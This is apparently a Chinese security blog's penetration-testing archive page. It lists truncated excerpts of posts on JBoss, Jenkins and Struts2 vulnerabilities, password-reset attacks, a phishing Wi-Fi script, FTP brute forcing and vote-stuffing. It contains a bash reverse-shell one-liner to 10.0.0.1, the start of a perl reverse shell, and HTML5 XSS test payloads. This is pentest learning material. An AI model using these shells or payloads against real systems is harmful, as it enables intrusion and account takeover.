2017
11-25
11-25
JBossAS 5.x反序列化远程命令执行漏洞(CVE-2017-12149)
Jboss AS 5.X 反序列化漏洞
漏洞成因
Jboss AS 5.X被曝出反序列化远程命令执行漏洞,主要是由于HTTP Invoker的ReadOnlyAccessFilter中的doFilter方法不会限制执行反序列化的类,从而允许攻击者通过精心设计的序列化数据执行任意代码。
发现.... Read More >
分类目录归档:渗透测试
Jboss AS 5.X 反序列化漏洞
漏洞成因
Jboss AS 5.X被曝出反序列化远程命令执行漏洞,主要是由于HTTP Invoker的ReadOnlyAccessFilter中的doFilter方法不会限制执行反序列化的类,从而允许攻击者通过精心设计的序列化数据执行任意代码。
发现.... Read More >
2017
11-01
11-01
任意用户密码重置的10种姿势
以前安全测试最爱挖的就是任意用户密码重置,今天看了carry_your师傅在ichunqiu上的视频文字总结一下任意用户密码重置的10种姿势:
1,短信验证码可爆破;
视频案例中输入手机号码、图片验证码就可以获取短信验证码,并且新密码也是在一个页面中,但是输入短信验证码之后,后端有个请求会判断短信验证码是否正确,错误的话页面会有提醒。攻击者可以用这个请求来爆破验证码,获取到正确的短信验.... Read More >
2017
05-05
05-05
wordpress 4.6远程代码执行漏洞环境搭建
这篇文章主要是记录下搭建漏洞测试环境的过程,然而从中午开始,断断续续的一直折腾到凌晨,只是搭建了成功了本地能复现的环境,并没有实现远程复现。
究其原因,主要是固执到一直想用daocloud来搭建测试环境,坑好多,花了太多时间来填坑了,记录下过程。
docker pull wordpress:.... Read More >
2017
05-03
05-03
Jenkins远程代码执行漏洞(CVE-2017-1000353)
Jenkins的又一java反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限。
有关漏洞的原理分析可以见下文:
https://blogs.securiteam.com/index.php/archives/3171
看到其它文章中介绍受影响的.... Read More >
2017
03-09
03-09
如何最大化的将漏洞扼杀在摇篮里
安全攻城狮在公司存在之初,刚开始更多进行的是救火的工作,救火工作并不能从根源上解决漏洞的产生。
如何最大化的将漏洞扼杀在产生之初,这个实际上某个dalao提的问题,问了几位老司机,做一下小笔记。
1,定期化的安全培训,需要注重培训效果、培训次数、培训覆盖面、帮助文档、培训反馈;
2,系统设计阶段,就需要安全测试小伙伴的介入,了解开发过程、熟悉业务流程,只有掌握足够多的信息,才能发.... Read More >
2017
03-07
03-07
[紧急预警]Struts2 基于Jakarta的远程命令执行漏洞
![[紧急预警]Struts2 基于Jakarta的远程命令执行漏洞](/wp-content/themes/frontopen2_v1.5.04.15/timthumb.php?src=/wp-content/uploads/2017/03/3333.jpeg&h=140&w=205&zc=1)
安恒给官方上报的,然后官方选择了1个对国内来说比较敏感的时期发了公告出来,好蛋疼。
该漏洞的CVE编号是CVE-2017-5638(s2-045),攻击者利用该漏洞可以进行远程命令执行,从而获取更高的服务器权限。
查了点资料,发现跟struts2配置中常量的配置有关,以struts-2..... Read More >
2015
12-05
12-05
JAVA反序列化命令执行漏洞利用详情(Jboss反弹SHELL)
前不久爆出的Java反序列化命令执行漏洞,一直没有进行测试。最近遇到个Jboss的站点,就抽空测试学习了一下利用的方法,过程中遇到很多坑啊,请教了很多小伙伴,非常感谢紫霞仙子大师傅的指点。
随风师傅的博客上有具体的漏洞原理分析:
http://www.iswin.org/2015/11/.... Read More >
2015
10-27
10-27
Jenkins脚本命令执行漏洞小总结
1,系统介绍
Jenkins是一个开源软件项目,旨在提供一个开放易用的软件平台,使软件的持续集成变成可能。
2,漏洞描述
Jenkins管理登陆之后,后台"系统管理"功能,有个"脚本命令行的"功能,它的作用是执行用于管理或故障探测或诊断的任意脚本命令,功能如图:
.... Read More >
2015
09-05
09-05
解决:Failed to open Jython JAR file
BurpSuite安装插件SQLipy的时候遇到如下的错误:
java.lang.Exception: Failed to open Jython JAR file
at burp.p9b.<init>(Unknown Source)
at burp.hec.a(Unknown.... Read More >
2015
07-25
07-25
Kali linux创建钓鱼wifi热点
最近做了一个小的安全意识培训,目的是让小伙伴们谨防不信任的Wifi热点,用到了kali linux下的一些小工具。我是用物理机安装的kali linux,然后外接了一个无线网卡wlan2。
具体的技术细节记录一下,具体的shell脚本如下:
#! /bin/bash
case $1 in
“start”)
sleep 1
ifconfig wla.... Read More >
2013
12-19
12-19
Discuz!x系列转换工具任意代码写入漏洞
Discuz!x系列转换工具存在任意代码写入漏洞,wooyun上猪猪侠和另外一大神刷rank也刷的差不多了,今天知道有童鞋已经公布了!
so,放出之前学习python写的漏洞利用exp, 只是练手学python,所以代码和功能都很粗糙。不知道漏洞作者是谁,看到此文的请留言认领!
这个漏洞.... Read More >
2013
11-19
11-19
FTP帐号密码暴力破解小工具(新手学python)
群内一童鞋写的ftp暴力破解小工具,主要用到了FTP模块,功能很简单,不大实用,还有很多需要改进的地方,贴上代码:
from ftplib import FTP
import time
def ConnectFtp(ftpAddress,user,password):
for myaddress in ftpAddress:
f=FTP(myaddress)
.... Read More >
2013
11-07
11-07
python自动投票(新手学python)
前段时间看到黑马发起的2013年度创业家评选的网络投票活动,发现没有对单IP投票次数进行限制,可以无限次的投!
公司的大BOSS居然也在候选名单中,准备给大BOSS刷点票,写了个python自动投票脚本!主要用了httplib模块自动提交post请求.
贴上代码:
#!/usr/bin/env python
#coding=utf8
import httplib, urlli.... Read More >
2013
11-04
11-04
Zabbix漏洞利用工具(新手学python)
最近学习 python,先来无事,写了一个Zabbix的漏洞利用工具,主要用了BeatuifulSoup模块,使用的时候需要先安装这个模块!
Zabbix是一些大中型企业常用的一款服务器管理监控系统,能够监控服务器的状态,并且能够实现批量配置服务器,是一款很给力的系统!
贴上代码:
#coding:gbk
__author__ = 'nx4dm1n'
impo.... Read More >
2013
10-21
10-21
反弹shell的十种姿势
转载自 Wooyun Zone
作者:XSSER
bash版本:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
注意这个是由解析shell的bash完成,所以某些情况下不支持
perl版本:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socke.... Read More >
2013
07-10
07-10
HTML5下的XSS测试代码
国外某童鞋收集整理的针对HTML5的
XSS测试代码
<video> <source onerror=”javascript:alert(1)”>
引入媒体类测试代码Example:
<video onerror=”javascript:alert(1)”>.... Read More >